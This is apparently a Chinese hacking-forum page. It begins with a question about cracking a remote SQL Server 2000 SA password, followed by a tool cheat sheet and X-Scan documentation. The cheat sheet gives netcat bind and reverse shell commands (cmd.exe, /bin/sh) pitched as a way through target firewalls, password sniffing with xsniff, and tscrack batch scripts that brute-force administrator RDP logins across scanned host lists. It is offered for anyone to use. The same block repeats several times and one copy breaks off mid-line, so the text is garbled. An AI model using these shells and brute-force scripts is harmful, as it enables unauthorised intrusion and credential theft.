如何破解 远程计算机的 SQL Server 2000 用户名(SA)的密码??
可以使用流光或XSCAN扫一下。速度不错的。
不会用的话可以看使用说明。这功能强大。绝对能扫出SA
nc.exe使用 ***
参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行〔危险〕
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在
remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的
cmdshell并反向连接192.168.0.2的5354端口
高级用法:
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
nc -L -p 80 c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到
CTR+C,同时把结果输出到c:\log.txt
nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,
直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端
口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用:nc -l -p 本机端口
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用:nc -d -l -p 本机端口 要传送的文件路径及名称
在对方主机上用:nc -vv 本机IP 本机端口 存放文件的路径及名称 传送文件
到对方主机
备 注:
| 管道命令
或 重定向命令。“”,例如:tlntadmn test.txt 指把test.txt的内容
赋值给tlntadmn命令
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt
d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中
与的区别 ""指:覆盖;""指:保存到(添加到)。
如:@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别
执行二次比较看:用的则是把二次的结果都保存了,而用:则只有一次的结果
,是因为第二次的结果把之一次的覆盖了。
2、扫锚工具:xscan.exe
基本格式
xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止
IP"段的所有主机信息
xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件
名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
- *** tp 检测 *** TP-Server漏洞
-sql 检测SQL-Server弱口令
- *** b 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置 *** 适配器, 适配器编号可通过"-l"参数获取
-l 显示所有 *** 适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量,并发主机数量 指定更大并发线程数量和并发主机数量, 默
认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测
192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port - *** b -t 150 -o 检测
192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,更大
并发线程数量为150,跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”
文件中列出的所有主机的标准端口状态,CGI漏洞,更大并发线程数量为200,同
一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
3、命令行方式嗅探器: xsniff.exe
可捕获局域网内FTP/ *** TP/POP3/HTTP协议密码
参数说明
-tcp 输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以ASCII形式输出
-hex 以16进制形式输出
用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在
pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和
udp信息并以ASCII格式输出
4、终端服务密码破解: tscrack.exe
参数说明
-h 显示使用帮助
-v 显示版本信息
-s 在屏幕上打出解密能力
-b 密码错误时发出的声音
-t 同是发出多个连接(多线程)
-N Prevent System Log entries on targeted server
-U 卸载移除tscrack组件
-f 使用-f后面的密码
-F 间隔时间(频率)
-l 使用-l后面的用户名
-w 使用-w后面的密码字典
-p 使用-p后面的密码
-D 登录主页面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破
主机的administrator的登陆密码
tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆
192.168.0.1的administrator用户
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主
机IP列表文件3389.txt)
3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、
pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)
hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的
administrator密码,并将破解结果保存在rouji.txt文件中。
本人比较懒汗,那么多呢!~不去记了整理出来HOHO大家也能用着,嘎嘎~
参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行〔危险〕
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在
remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的
cmdshell并反向连接192.168.0.2的5354端口
高级用法:
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
nc -L -p 80 c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到
CTR+C,同时把结果输出到c:\log.txt
nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,
直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端
口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用:nc -l -p 本机端口
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用:nc -d -l -p 本机端口 要传送的文件路径及名称
在对方主机上用:nc -vv 本机IP 本机端口 存放文件的路径及名称 传送文件
到对方主机
备 注:
| 管道命令
或 重定向命令。“”,例如:tlntadmn test.txt 指把test.txt的内容
赋值给tlntadmn命令
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt
d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中
与的区别 ""指:覆盖;""指:保存到(添加到)。
如:@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别
执行二次比较看:用的则是把二次的结果都保存了,而用:则只有一次的结果
,是因为第二次的结果把之一次的覆盖了。
2、扫锚工具:xscan.exe
基本格式
xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止
IP"段的所有主机信息
xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件
名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
- *** tp 检测 *** TP-Server漏洞
-sql 检测SQL-Server弱口令
- *** b 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置 *** 适配器, 适配器编号可通过"-l"参数获取
-l 显示所有 *** 适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量,并发主机数量 指定更大并发线程数量和并发主机数量, 默
认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测
192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port - *** b -t 150 -o 检测
192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,更大
并发线程数量为150,跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”
文件中列出的所有主机的标准端口状态,CGI漏洞,更大并发线程数量为200,同
一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
3、命令行方式嗅探器: xsniff.exe
可捕获局域网内FTP/ *** TP/POP3/HTTP协议密码
参数说明
-tcp 输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以ASCII形式输出
-hex 以16进制形式输出
用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在
pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和
udp信息并以ASCII格式输出
4、终端服务密码破解: tscrack.exe
参数说明
-h 显示使用帮助
-v 显示版本信息
-s 在屏幕上打出解密能力
-b 密码错误时发出的声音
-t 同是发出多个连接(多线程)
-N Prevent System Log entries on targeted server
-U 卸载移除tscrack组件
-f 使用-f后面的密码
-F 间隔时间(频率)
-l 使用-l后面的用户名
-w 使用-w后面的密码字典
-p 使用-p后面的密码
-D 登录主页面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破
主机的administrator的登陆密码
tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆
192.168.0.1的administrator用户
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主
机IP列表文件3389.txt)
3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、
pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)
hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的
administrator密码,并将破解结果保存在rouji.txt文件中。
本人比较懒汗,那么多呢!~不去记了整理出来HOHO大家也能用着,嘎嘎~
参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行〔危险〕
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在
remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的
cmdshell并反向连接192.168.0.2的5354端口
高级用法:
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
nc -L -p 80 c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到
CTR+C,同时把结果输出到c:\log.txt
nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,
直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端
口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用:nc -l -p 本机端口
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用:nc -d -l -p 本机端口 要传送的文件路径及名称
在对方主机上用:nc -vv 本机IP 本机端口 存放文件的路径及名称 传送文件
到对方主机
备 注:
| 管道命令
或 重定向命令。“”,例如:tlntadmn test.txt 指把test.txt的内容
赋值给tlntadmn命令
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt
d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中
与的区别 ""指:覆盖;""指:保存到(添加到)。
如:@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别
执行二次比较看:用的则是把二次的结果都保存了,而用:则只有一次的结果
,是因为第二次的结果把之一次的覆盖了。
2、扫锚工具:xscan.exe
基本格式
xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止
IP"段的所有主机信息
xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件
名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
- *** tp 检测 *** TP-Server漏洞
-sql 检测SQL-Server弱口令
- *** b 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置 *** 适配器, 适配器编号可通过"-l"参数获取
-l 显示所有 *** 适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量,并发主机数量 指定更大并发线程数量和并发主机数量, 默
认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测
192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port - *** b -t 150 -o 检测
192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,更大
并发线程数量为150,跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”
文件中列出的所有主机的标准端口状态,CGI漏洞,更大并发线程数量为200,同
一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
3、命令行方式嗅探器: xsniff.exe
可捕获局域网内FTP/ *** TP/POP3/HTTP协议密码
参数说明
-tcp 输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以ASCII形式输出
-hex 以16进制形式输出
用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在
pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和
udp信息并以ASCII格式输出
4、终端服务密码破解: tscrack.exe
参数说明
-h 显示使用帮助
-v 显示版本信息
-s 在屏幕上打出解密能力
-b 密码错误时发出的声音
-t 同是发出多个连接(多线程)
-N Prevent System Log entries on targeted server
-U 卸载移除tscrack组件
-f 使用-f后面的密码
-F 间隔时间(频率)
-l 使用-l后面的用户名
-w 使用-w后面的密码字典
-p 使用-p后面的密码
-D 登录主页面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破
主机的administrator的登陆密码
tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆
192.168.0.1的administrator用户
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主
机IP列表文件3389.txt)
3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、
pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)
hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的
administrator密码,并将破解结果保存在rouji.txt文件中。
本人比较懒汗,那么多呢!~不去记了整理出来HOHO大家也能用着,嘎嘎~
参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行〔危险〕
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在
remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的
cmdshell并反向连接192.168.0.2的5354端口
高级用法:
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
nc -L -p 80 c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到
CTR+C,同时把结果输出到c:\log.txt
nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,
直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端
口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用:nc -l -p 本机端口
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用:nc -d -l -p 本机端口 要传送的文件路径及名称
在对方主机上用:nc -vv 本机IP 本机端口 存放文件的路径及名称 传送文件
到对方主机
备 注:
| 管道命令
或 重定向命令。“”,例如:tlntadmn test.txt 指把test.txt的内容
赋值给tlntadmn命令
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt
d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中
与的区别 ""指:覆盖;""指:保存到(添加到)。
如:@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别
执行二次比较看:用的则是把二次的结果都保存了,而用:则只有一次的结果
,是因为第二次的结果把之一次的覆盖了。
2、扫锚工具:xscan.exe
基本格式
xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止
IP"段的所有主机信息
xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件
名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
- *** tp 检测 *** TP-Server漏洞
-sql 检测SQL-Server弱口令
- *** b 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置 *** 适配器, 适配器编号可通过"-l"参数获取
-l 显示所有 *** 适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量,并发主机数量 指定更大并发线程数量和并发主机数量, 默
认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测
192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port - *** b -t 150 -o 检测
192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,更大
并发线程数量为150,跳过没有检测到开放端口的主机
xscan -file ho
分析X-Scan,写出它的使用 *** 以及配置 *** ,同时抓包分析其扫描原理。如果有兴趣分析一下其脚本
一. 系统要求:Windows NT/2000/XP/2003
理论上可运行于Windows NT系列操作系统,推荐运行于Windows 2000以上的Server版Windows系统。
二. 功能简介:
采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能。扫描内容包括:远程服务类型、操作系统类型及版本,各种弱口令漏洞、后门、应用服务漏洞、 *** 设备漏洞、拒绝服务漏洞等二十几个大类。对于多数已知漏洞,我们给出了相应的漏洞描述、解决方案及详细描述链接,其它漏洞资料正在进一步整理完善中,您也可以通过本站的“安全文摘”和“安全漏洞”栏目查阅相关说明。
3.0及后续版本提供了简单的插件开发包,便于有编程基础的朋友自己编写或将其他调试通过的代码修改为X-Scan插件。另外Nessus攻击脚本的翻译工作已经开始,欢迎所有对 *** 安全感兴趣的朋友参与。需要“Nessus攻击脚本引擎”源代码、X-Scan插件SDK、示例插件源代码或愿意参与脚本翻译工作的朋友,可通过本站“X-Scan”项目链接获取详细资料:“”。
三. 所需文件:
xscan_gui.exe -- X-Scan图形界面主程序
checkhost.dat -- 插件调度主程序
update.exe -- 在线升级主程序
*.dll -- 主程序所需动态链接库
使用说明.txt -- X-Scan使用说明
/dat/language.ini -- 多语言配置文件,可通过设置“LANGUAGE\SELECTED”项进行语言切换
/dat/language.* -- 多语言数据文件
/dat/config.ini -- 当前配置文件,用于保存当前使用的所有设置
/dat/*.cfg -- 用户自定义配置文件
/dat/*.dic -- 用户名/密码字典文件,用于检测弱口令用户
/plugins -- 用于存放所有插件(后缀名为.xpn)
/scripts -- 用于存放所有NASL脚本(后缀名为.nasl)
/scripts/desc -- 用于存放所有NASL脚本多语言描述(后缀名为.desc)
/scripts/cache -- 用于缓存所有NASL脚本信息,以便加快扫描速度(该目录可删除)
四. 准备工作:
X-Scan是完全免费软件,无需注册,无需安装(解压缩即可运行,自动检查并安装WinPCap驱动程序)。若已经安装的WinPCap驱动程序版本不正确,请通过主窗口菜单的“工具”-“Install WinPCap”重新安装“WinPCap 3.1 beta4”或另行安装更高版本。
五. 图形界面设置项说明:
“检测范围”模块:
“指定IP范围” - 可以输入独立IP地址或域名,也可输入以“-”和“,”分隔的IP范围,如“192.168.0.1-20,192.168.1.10-192.168.1.254”,或类似“192.168.100.1/24”的掩码格式。
“从文件中获取主机列表” - 选中该复选框将从文件中读取待检测主机地址,文件格式应为纯文本,每一行可包含独立IP或域名,也可包含以“-”和“,”分隔的IP范围。
“全局设置”模块:
“扫描模块”项 - 选择本次扫描需要加载的插件。
“并发扫描”项 - 设置并发扫描的主机和并发线程数,也可以单独为每个主机的各个插件设置更大线程数。
“ *** 设置”项 - 设置适合的 *** 适配器,若找不到 *** 适配器,请重新安装WinPCap 3.1 beta4以上版本驱动。
“扫描报告”项 - 扫描结束后生成的报告文件名,保存在LOG目录下。扫描报告目前支持TXT、HTML和XML三种格式。
“其他设置”项:
“跳过没有响应的主机” - 若目标主机不响应ICMP ECHO及TCP SYN报文,X-Scan将跳过对该主机的检测。
“无条件扫描” - 如标题所述
“跳过没有检测到开放端口的主机” - 若在用户指定的TCP端口范围内没有发现开放端口,将跳过对该主机的后续检测。
“使用NMAP判断远程操作系统” - X-Scan使用SNMP、NETBIOS和NMAP综合判断远程操作系统类型,若NMAP频繁出错,可关闭该选项。
“显示详细信息” - 主要用于调试,平时不推荐使用该选项。
“插件设置”模块:
该模块包含针对各个插件的单独设置,如“端口扫描”插件的端口范围设置、各弱口令插件的用户名/密码字典设置等。
六. 常见问题解答:
Q:如果没有安装WinPCap驱动程序是否能正常使用X-Scan进行扫描?
A:如果系统未安装WinPCap驱动,X-Scan启动后会自动安装WinPCap 3.1;如果系统已经安装了WinPCap更高版本,X-Scan则使用已有版本。
Q:扫描一个子网,进程里同时出现10个checkhost.exe的进程是什么原因?
A:检测每个主机都会单独起一个Checkhost.exe进程,检测完毕会自动退出。并发主机数量可以通过图形界面的设置窗口设定,命令行程序通过“-t”参数设定。
Q:扫描过程中机器突然蓝屏重启是什么原因?
A:扫描过程中系统蓝屏是有可能的,AtGuard、天网等防火墙的驱动程序在处理特殊包的时候有可能出错导致系统崩溃,另外很多防火墙驱动与WinPCap驱动本身也存在冲突,建议先禁止或卸载防火墙程序再试试。
Q:操作系统识别不正确是什么原因?
A:操作系统识别方面确实不能保证100%的准确率,目前是综合NMAP、P0F的指纹库、NETBIOS信息和SNMP信息进行识别,如果目标机器没有开放NETBIOS和SNMP协议,TCP/IP堆栈指纹也不在数据库中,就需要使用者根据其他信息综合分析了。
Q:为什么在一次扫描中我选择了“SYN”方式进行端口扫描,但X-Scan实际采用的是“TCP”方式,而且也没有被动识别出目标操作系统?
A:端口扫描中的“SYN”方式在NT4或XP+SP2系统下无法使用,在windows 2000等系统下使用时必须拥有管理员权限,否则将自动改用“TCP”方式进行端口扫描。
Q:新版本是否兼容2.3版本的插件?
A:X-Scan 3.0以上版本的插件接口做了少量修改,不兼容2.3以前版本的插件,需要原作者做相应修改。3.0以上版本提供了简单的开发库,插件开发方面要比2.3版本轻松许多。
Q:我看到Scripts目录下有很多nessus的脚本,是否可以自己从nessus的网站上下载最新的plugin,然后解压到scripts目录中,实现扫描最新漏洞?
A:X-Scan移植了nessus的nasl引擎,目前对应于nessus2.2.4,但不包含对本地检测脚本的支持。所以只要是这个版本nessus支持的非本地检测脚本,都可以复制到Scripts目录下加载。
Q:X-Scan中各项弱口令插件检测范围都很有限,能否自己加入其他需要检测的帐号或口令?
A:在“X-Scan”中内置的密码字典仅为简单示范,使用者如果希望软件有更强的密码猜解能力,可以自己编辑密码字典文件。
Q:为什么nasl脚本扫描结果中存在大量英文,将来有没有可能会对这些英文信息进行汉化?
A:目前已有将近2000个NASL脚本,里面的描述信息大都是英文,需要翻译的内容可以在本站“焦点项目”中的X-Scan下看到。欢迎大家一起帮忙翻译,通过审核后会直接加入在线升级库供大家下载。
Q:用xscan.exe在命令行方式下进行扫描时,如何暂停或终止扫描?
A:命令行方式检测过程中,按“[空格]”键可查看各线程状态及扫描进度,按“[回车]”可暂停或继续扫描,按“q”键可保存当前数据后提前退出程序,按“ctrl+c”强行关闭程序。
Q:X-Scan如何安装,是否需要注册?
A:X-Scan是完全免费软件,无需注册,无需安装(解压缩即可运行,自动安装WinPCap驱动)。
七. 版本发布:
X-Scan v3.3 -- 发布日期:07/18/2005,优化主程序及NASL库;修正已知BUG;更新攻击测试脚本及中文描述。
感谢wlj、killer、coolc协助测试,感谢通过各种方式提供反馈信息及建议的朋友。
X-Scan v3.2 -- 发布日期:04/08/2005,升级NASL库,优化主程序及NASL库;增加HTTP/TELNET/SSH/VNC/CVS/IMAP等弱口令检测插件;修正已知BUG。
感谢wlj提供大量改进建议及相关资料,感谢安全焦点全体成员和coolc、killer等朋友协助测试。
X-Scan v3.1 -- 发布日期:03/25/2004,修改“存活主机”插件,加入2.3版本中SNMP、NETBIOS插件,优化主程序及NASL库。
X-Scan v3.02 -- 发布日期:03/08/2004,“WinPCap 3.1 beta”中存在BUG,可能导致CheckHost.exe异常。X-Scan中改用“WinPCap 2.3”,建议卸载“WinPCap 3.1 beta”后再使用X-Scan进行扫描。
X-Scan v3.0 -- 发布日期:03/01/2004,修正beta版本中已知BUG,对主程序及所有插件进行优化,升级NASL库,支持2.0.10a版本以前的所有NASL脚本;提供简单的开发包方便其他朋友共同开发插件;其他插件正在开发中。
